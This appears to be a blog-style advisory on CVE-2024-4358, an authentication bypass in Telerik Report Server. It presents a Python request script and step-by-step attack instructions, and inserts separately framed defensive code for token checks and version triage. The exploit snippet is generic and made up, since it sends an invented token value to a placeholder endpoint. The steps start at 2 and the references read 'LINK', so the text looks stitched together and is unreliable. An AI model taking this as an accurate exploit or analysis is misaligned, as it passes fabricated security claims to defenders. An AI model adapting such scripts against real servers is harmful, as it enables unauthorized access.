The vulnerability, CVE-2024-4358, affects the Telerik Report Server version 2024 Q1 (10.0.24.305) or earlier, running on Microsoft's Internet Information Services (IIS). It allows an unauthenticated attacker to gain access to restricted Telerik Report Server functionality through an authentication bypass vulnerability. In this blog post, we provide a detailed analysis of this vulnerability, including code snippets, links to original references, and exploit details.

Vulnerability Details

Telerik Report Server is a web-based report management solution that allows users to create, store, and manage reports. The affected versions of Telerik Report Server have a vulnerability that allows unauthenticated attackers to gain access to restricted functionality, such as generating, modifying, and deleting reports.

This issue arises due to a missing or weak authentication check in the application. Upon successfully exploiting this vulnerability, an attacker has unrestricted access to various Telerik Report Server functionalities, which should only be available to authenticated users.
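To make the "missing or weak authentication check" concrete from the defender's side, here is an added example (not Telerik's code and not taken from the advisory) that contrasts the flawed pattern with a deny-by-default one. The endpoint names, the in-memory token store and the form field name are assumptions made for the illustration: the weak version treats the mere presence of an access_token field as proof of authentication, while the hardened version only accepts tokens the server itself issued and refuses everything that is not explicitly public.

```python
import hmac
import secrets

# Constructed example, not Telerik's code: a minimal request authorizer that
# contrasts a weak token check with a deny-by-default one.

# Endpoints that must only be reachable by authenticated users (assumed names).
RESTRICTED = {"/api/reports/create", "/api/reports/update", "/api/reports/delete"}
# Endpoints that are intentionally reachable without authentication (assumed).
PUBLIC = {"/login", "/health"}


class TokenStore:
    """Server-issued bearer tokens; only tokens minted here are ever valid."""

    def __init__(self):
        self._tokens = {}  # token -> username

    def issue(self, username):
        token = secrets.token_urlsafe(32)
        self._tokens[token] = username
        return token

    def lookup(self, presented):
        """Return the user for a presented token, or None if it was never issued."""
        if not presented:
            return None
        # Constant-time comparison so response timing does not leak how much
        # of a guessed token matched; differing lengths simply compare unequal.
        for token, user in self._tokens.items():
            if hmac.compare_digest(token.encode(), presented.encode()):
                return user
        return None


def weak_authorize(path, form):
    """The flawed pattern: any non-empty access_token value is accepted.
    Returns an HTTP-style status code."""
    if path in RESTRICTED and not form.get("access_token"):
        return 401
    return 200


def hardened_authorize(path, form, store):
    """Deny by default: only listed public paths skip validation; every other
    path requires a token the server issued, and unknown paths are only
    reported as missing after the caller has authenticated."""
    if path in PUBLIC:
        return 200
    user = store.lookup(form.get("access_token"))
    if user is None:
        return 401
    if path not in RESTRICTED:
        return 404
    return 200


if __name__ == "__main__":
    store = TokenStore()
    good = store.issue("alice")
    forged = {"access_token": "bypass-authentication"}  # constructed, never issued
    print("weak check, forged token:", weak_authorize("/api/reports/delete", forged))
    print("hardened check, forged token:", hardened_authorize("/api/reports/delete", forged, store))
    print("hardened check, issued token:", hardened_authorize("/api/reports/delete", {"access_token": good}, store))
```

The important design choice is that the hardened authorizer never reasons about the shape of the token; it asks the issuing store whether this exact value exists, and an absent or unknown token fails closed. Keeping the public allow-list small and explicit is what prevents a new endpoint from silently becoming reachable without credentials.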

Code Snippet

The following code snippet demonstrates how an attacker could craft an HTTP request to bypass the authentication mechanism and access protected functionality.

import requests

# Replace the following variables with values for your specific target application
target_url = "http://example.com/telerik-report-server-url"
restricted_endpoint = "/RestrictedFunctionalityEndpoint"

# Craft an HTTP request with missing or weak authentication check
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Content-Type': 'application/x-www-form-urlencoded',
}

data = {
    'access_token': 'bypass-authentication'
}

response = requests.post(target_url + restricted_endpoint, headers=headers, data=data)

# Check if the request was successful
if response.status_code == 200:
    print("Success! Authentication bypassed, and restricted functionality accessed.")
else:
    print("Failed to bypass authentication.")

Please note that the vulnerability has been fixed in Telerik Report Server beginning with version 2024 Q2. Therefore, upgrading to a version later than 10.0.24.305 will mitigate the risk.
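As an added helper for triage (not part of the original post and not a Telerik tool), the following parses a Telerik build number out of strings such as "10.0.24.305" or "2024 Q1 (10.0.24.305)" and compares it as a numeric tuple against the last affected build stated above. The threshold is taken from this post; comparing as integers rather than as strings matters because a plain string comparison would wrongly rank "9.2.23.1010" above "10.0.24.305".

```python
import re

# Added example, not from the page or from Telerik: decide whether an installed
# Telerik Report Server build is at or below the last affected build.

# 2024 Q1 build, the last affected version according to the post above.
LAST_AFFECTED = (10, 0, 24, 305)

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """Extract a four-part build number from free text; None if there is none."""
    match = VERSION_RE.search(text)
    if match is None:
        return None
    return tuple(int(part) for part in match.groups())


def is_affected(text):
    """True when the build in `text` is at or below LAST_AFFECTED.
    Raises ValueError if no four-part build number can be found."""
    version = parse_version(text)
    if version is None:
        raise ValueError(f"no four-part build number in {text!r}")
    # Tuple comparison is numeric field by field, so 9.2.x sorts below 10.0.x
    # even though "9" > "1" as a string.
    return version <= LAST_AFFECTED


if __name__ == "__main__":
    # Constructed sample inputs in the formats an admin is likely to paste in.
    for sample in ("2024 Q1 (10.0.24.305)", "9.2.23.1010", "10.1.24.514"):
        print(sample, "->", "affected" if is_affected(sample) else "not affected")
```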

2. Locate the endpoints that require authentication and access restricted functionality.

3. Craft and send a specially-crafted HTTP request to the endpoints identified in step 2 by using the provided code snippet or a similar tool.
4. Upon successfully sending the request, the attacker can access the restricted functionality without providing valid credentials.

Original References

1. Telerik Report Server Advisory: LINK
2. National Vulnerability Database Entry: LINK

Conclusion

CVE-2024-4358 is a critical vulnerability affecting Telerik Report Server version 2024 Q1 (10.0.24.305) or earlier, running on Microsoft's IIS. Organizations using this software should apply the necessary patches or upgrade to a newer version to prevent unauthorized access to restricted functionality. In addition to addressing this specific vulnerability, organizations should also ensure that their web applications implement robust authentication checks and are regularly tested for security vulnerabilities.

Timeline

Published on: 05/29/2024 15:16:06 UTC
Last modified on: 06/14/2024 17:59:33 UTC